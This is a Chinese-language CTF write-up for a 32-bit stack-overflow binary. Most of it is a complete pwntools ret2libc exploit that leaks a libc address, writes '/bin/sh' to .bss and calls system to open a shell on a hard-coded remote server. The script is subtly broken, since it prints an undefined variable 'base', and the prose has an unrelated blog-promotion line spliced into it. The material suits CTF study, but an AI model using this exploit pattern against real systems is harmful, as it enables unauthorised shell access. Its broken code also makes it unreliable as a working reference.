拿到题目,发现有libc库,想到应该就是要用到ret2libc了
先把pwn扔到IDA看看先
发现有明显的溢出漏洞。
发现程序是32位,且只开启了NX保护
利用思路:
1、泄漏__libc_start_main的真实地址,padding + write_plt + game_addr + 1 + GOT(__libc_start_main) + 4
2、然后根据libc库的偏移,计算出system的真实地址
a可以看到偏移为0x22860
扫描二维码关注公众号,回复:
4545767 查看本文章
3、写入/bin/sh到bss段,我这里需要用到gadgets(pop_pop_pop_ret),我是用ROPgadget.py搜索的
可以看到 pppr的地址为 0x080487a9
4、调用system,getshell
from pwn import *
#context.log_level = 'debug'
io=remote('117.50.59.220',12345)
elf = ELF('./pwn')
write_plt = elf.plt['write']
read_plt = elf.plt['read']
game_addr = elf.symbols['game']
bss = elf.bss()
system_off = 0x22860
pppr = 0x080487a9
io.recvuntil("your name ?\n")
payload = 'A'*88
payload += p32(write_plt) + p32(game_addr)
payload += p32(1) + p32(elf.got['__libc_start_main']) + p32(4)
io.sendline(payload)
io.recv()
io.sendline('1111')
io.recvuntil('\n')
io.recvuntil('\n')
libc_start_main = u32(io.recv(4))
print(hex(base))
io.recvuntil("your name ?\n")
system = libc_start_main + system_off
payload = 'A'*88
payload += p32(read_plt) + p32(pppr) + p32(0) + p32(bss) + p32(8)
#写入“/bin/sh”到bss段
payload += p32(system) + p32(game_addr) + p32(bss)
#调用system
io.sendline(payload)
io.recv()
io.sendline('1111')
io.recvuntil('\n')
io.recvuntil('\n')
io.sendline('/bin/sh\x00')
io.interactive()